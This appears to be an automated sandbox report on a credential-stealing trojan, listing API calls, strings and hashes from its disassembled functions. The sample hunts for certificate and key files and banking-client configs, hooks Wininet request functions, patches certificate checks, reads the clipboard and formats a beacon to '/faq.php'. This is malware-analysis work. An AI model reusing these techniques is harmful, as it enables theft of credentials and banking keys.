                                                                                                                                                                                                              • Instruction ID: 80e14936e6e70ca044aad9fda937675a06ae1109ffc8d6795c306f37f11afeff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 717ee762f334e2970d078c7f1154bea23cb61ef7fd88319f4a77a2a0366f0458
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C1205316002069FDB25EF68D898BEABBF5FF49305F548198E949DB341D731AE44CB80
                                                                                                                                                                                                              Function 012FD120 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 346fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 012FD13F
                                                                                                                                                                                                              • memset.MSVCRT ref: 012FD161
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?,?,00000000,0000040C,00000103,?,775B7390), ref: 012FD176
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 012FD18F
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 012FD1D8
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 012FD1EB
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 012FD24D
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 012FD563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                              • String ID: *.00*$.txt$.zip$61C5C0CB$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 989413159-176303379
                                                                                                                                                                                                              • Opcode ID: d0550ab75098afaab54ce17bc0b7a4bba32b3d68083dce7a651c8a7a830380e9
                                                                                                                                                                                                              • Instruction ID: d23014b2e8c50426afd2be6d46e01b9da6f48567ffe556dcacd8772739b541c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0550ab75098afaab54ce17bc0b7a4bba32b3d68083dce7a651c8a7a830380e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DC1A3711083468FC726DF789468AABBBE9EF89305F14856DFA85C7241EB70D508CB91
                                                                                                                                                                                                              Function 012ECDC0 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 342windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(7707BCB0,774D30D0,7707BCB0,774D3050), ref: 012ECE1A
                                                                                                                                                                                                              • IsIconic.USER32(7707BCB0), ref: 012ECE25
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?,774D30D0,7707BCB0,774D3050), ref: 012ECE82
                                                                                                                                                                                                              • GetAncestor.USER32(7707BCB0,00000003), ref: 012ECEA7
                                                                                                                                                                                                              • GetWindow.USER32(?,00000003), ref: 012ECF20
                                                                                                                                                                                                              • IsWindow.USER32(7707BCB0), ref: 012ECF48
                                                                                                                                                                                                              • IsIconic.USER32(7707BCB0), ref: 012ECF53
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000038), ref: 012ECF82
                                                                                                                                                                                                              • GetWindow.USER32(7707BCB0,00000005,00000001,00000000,7707BCB0), ref: 012ECFA6
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012ECFA9
                                                                                                                                                                                                                • Part of subcall function 012EDCE0: GetClassNameA.USER32(?,?,00000101), ref: 012EDCF6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Iconic$AncestorClassInfoNamememset
                                                                                                                                                                                                              • String ID: <$<
                                                                                                                                                                                                              • API String ID: 3351429209-213342407
                                                                                                                                                                                                              • Opcode ID: e14a334bdd0783c2d97d13d80733d55bf561b676515e68a58a402900de09f324
                                                                                                                                                                                                              • Instruction ID: 312d5a1b6f4a97fc4d810fc590f2afc9c2ee5e517efdc9688dafd39ae494ae5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e14a334bdd0783c2d97d13d80733d55bf561b676515e68a58a402900de09f324
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87D19271D2021A9BEB31EFE8D848BEEBBF8BF04710F544159E615A3285D7709A51CFA0
                                                                                                                                                                                                              Function 012F6970 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 261memorysleepfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000A8), ref: 012F6991
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000F0), ref: 012F69C7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F69CE
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-000000F0), ref: 012F69E3
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000), ref: 012F69F2
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 012F6A06
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F6A2C
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 012F6A6A
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,?,id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d,?,00000000,?,01329AFC,01329AF8,?,00000000), ref: 012F6AA6
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 012F6ABB
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 012F6AD3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012F6AE2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012F6AEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F6B64
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F6B67
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F6B74
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F6B77
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,013296FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 012F6BED
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F6BF0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F6BFD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F6C00
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 012F6C0F
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012F6C1C
                                                                                                                                                                                                              • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,013296FC,00000001,00000000,00000000,/faq.php,?,00000001,?,013296FC,00000001), ref: 012F6C61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$#680AllocCountInformationNamePathTickTimeZone_snprintf
                                                                                                                                                                                                              • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                              • API String ID: 1472505117-4291654836
                                                                                                                                                                                                              • Opcode ID: d163968000e7662ba54135d8c86670251ac1e6d6ebc05c1dbb437a536e0cc066
                                                                                                                                                                                                              • Instruction ID: f10eff687594d885f0c468df9f3f4e45015b0e8e855648e18afa7139ec2de22b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d163968000e7662ba54135d8c86670251ac1e6d6ebc05c1dbb437a536e0cc066
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F481BC71A5021AABDB35AF74CD49FEABB7CEB44704F044168FB05E71C4EA709A05CBA0
                                                                                                                                                                                                              Function 012F1190 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 137libraryloadermemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,774CF550,00000000), ref: 012F11AE
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 012F11C4
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,774D1620), ref: 012F11DC
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 012F11FE
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 012F120A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 012F1220
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 012F123C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 012F1258
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 012F1274
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 012F1290
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 012F12AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 012F12C8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 012F12E4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 012F1300
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                              • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                              • API String ID: 1705253364-835984666
                                                                                                                                                                                                              • Opcode ID: 122129ed595366aea5c63170736e12f790e85281c9b8de4799e6295a5da1fdd4
                                                                                                                                                                                                              • Instruction ID: e00aab2f610537250a3807ad93ba4259167017847190aec734ae662f7f5d394a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 122129ed595366aea5c63170736e12f790e85281c9b8de4799e6295a5da1fdd4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E031B3B4BA0337B1EA2076B75D16F6BA55C4F10E88F60013CFB04F2284EBA5E611867C
                                                                                                                                                                                                              Function 012E1170 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 203memorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E118E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 012E11AD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 012E11C5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 012E11DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.p12), ref: 012E11FF
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1221
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E123E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1245
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1255
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1271
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FB4B0,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1285
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,serverkey.dat), ref: 012E12A4
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E12D5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E12F2
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E12F9
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E1309
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E1325
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FEB30,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E1339
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013001A0,00000000,00000000,00000000,?,?,?,?,serverkey.dat), ref: 012E1376
                                                                                                                                                                                                                • Part of subcall function 012FB410: PathAddBackslashA.SHLWAPI(61c5c09f), ref: 012FB437
                                                                                                                                                                                                                • Part of subcall function 012FB410: PathFileExistsA.SHLWAPI(?), ref: 012FB4A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,serverkey.dat), ref: 012E138E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,serverkey.dat), ref: 012E139F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                              • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                              • API String ID: 183229269-3502489836
                                                                                                                                                                                                              • Opcode ID: d60460767e27440d84b533e35fdd68c2c24035dfd09676685b5bf4c053cd42b7
                                                                                                                                                                                                              • Instruction ID: f3bbb49493cf55d8ce3a34c0885f37c6ff7ede143e22205604724fd896473d5f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d60460767e27440d84b533e35fdd68c2c24035dfd09676685b5bf4c053cd42b7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A51C871A553267AFB316B298C4DFEB3FACAF01B61F544228FB04A61C4DBB09550C6B4
                                                                                                                                                                                                              Function 013025C0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 169stringsynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013025F0
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 013025FD
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 01302612
                                                                                                                                                                                                                • Part of subcall function 012E74A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,9e2b3e8fa,7765C3F0,?,?,012F2600,00000000,00000001), ref: 012E74C6
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E74E4
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E750D
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapAlloc.KERNEL32(00000000,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7514
                                                                                                                                                                                                                • Part of subcall function 012E74A0: memset.MSVCRT(00000000,00000000,00000001,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7527
                                                                                                                                                                                                                • Part of subcall function 012E74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E7553
                                                                                                                                                                                                                • Part of subcall function 012E74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7563
                                                                                                                                                                                                                • Part of subcall function 012E74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 012E7572
                                                                                                                                                                                                                • Part of subcall function 012E74A0: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7585
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E7594
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapValidate.KERNEL32(00000000), ref: 012E759B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 0130265D
                                                                                                                                                                                                              • strstr.MSVCRT(-00000005,0132A7EC,?,00000000,00000001), ref: 0130267D
                                                                                                                                                                                                              • strstr.MSVCRT(-00000005,013256DC), ref: 0130268F
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 013026BE
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 013026DB
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013026E2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013026F4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01302705
                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 01302753
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 0130276A
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 01302773
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$CharCreateHandleMutexNamePathProcessUpperstrstr$AllocCloseExistsFindInformationLockModulePointerPrivateProfileReadReleaseSizeSleepStringUnlockValidatememset
                                                                                                                                                                                                              • String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$interpro.ini
                                                                                                                                                                                                              • API String ID: 1854838805-2875928083
                                                                                                                                                                                                              • Opcode ID: b8578e45b58181de5561763717fa02ad53d49520e042181125b06827e07a5a2b
                                                                                                                                                                                                              • Instruction ID: 922acd8fba77a7bc14b6ad75ab77e6a3b03278fcf5c4666dec9d7100d014d53c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8578e45b58181de5561763717fa02ad53d49520e042181125b06827e07a5a2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 525128315003159BD733AF68DC98BAB7FFDAB05B18F14415CE98593286DBB0D645CBA0
                                                                                                                                                                                                              Function 0130DA50 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 297stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,0000013C), ref: 0130DA71
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,0000024C), ref: 0130DA8C
                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 0130DB7A
                                                                                                                                                                                                              • strchr.MSVCRT(Desk,0000005C,?,00000000), ref: 0130DB89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FolderPathSpecialstrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              • API String ID: 2246752426-2295261572
                                                                                                                                                                                                              • Opcode ID: 87e3049e6f9e99917ea368fcf0356085d927d63f4e72f1c9a10b74ae1d2138c9
                                                                                                                                                                                                              • Instruction ID: d77c9248bb7aa9056503350e7c3eb4909d8e21aed84218e9877075a6aabe966e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87e3049e6f9e99917ea368fcf0356085d927d63f4e72f1c9a10b74ae1d2138c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AA139719002199FEF32DBE8CC64FEA77E9AF45314F1442D4EA499B1C1D670AA858B90
                                                                                                                                                                                                              Function 012F317E Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 297memorythreadclipboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 012F323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 012F325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012F327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 012F3286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 012F329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 012F32AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 012F32D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 012F32FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F3301
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013), ref: 012F3311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 012F332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012F3399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012F33DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              • Opcode ID: 466c0e9415580a8853eea45a902fed171a09512f05fed47f5a601942f501fbab
                                                                                                                                                                                                              • Instruction ID: 80a503dda8ba3d7b9a2d26c1a447077db4c9ce565cb650e2bdf2366e165c7a36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 466c0e9415580a8853eea45a902fed171a09512f05fed47f5a601942f501fbab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80419031115312ABE731EF689C48FABBBACFF46750F14462CFB4596284DB64D604C7A1
                                                                                                                                                                                                              Function 012F1900 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 121memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(\iexplore.exe), ref: 012F190E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 012F1915
                                                                                                                                                                                                              • memset.MSVCRT(0132E230,00000000,000002D1,0132E230,0132E230), ref: 012F1990
                                                                                                                                                                                                              • #680.SHELL32(00000000), ref: 012F1999
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,774CF550,774D1620,80000002), ref: 012F19E3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F19E6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F19F3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F19F6
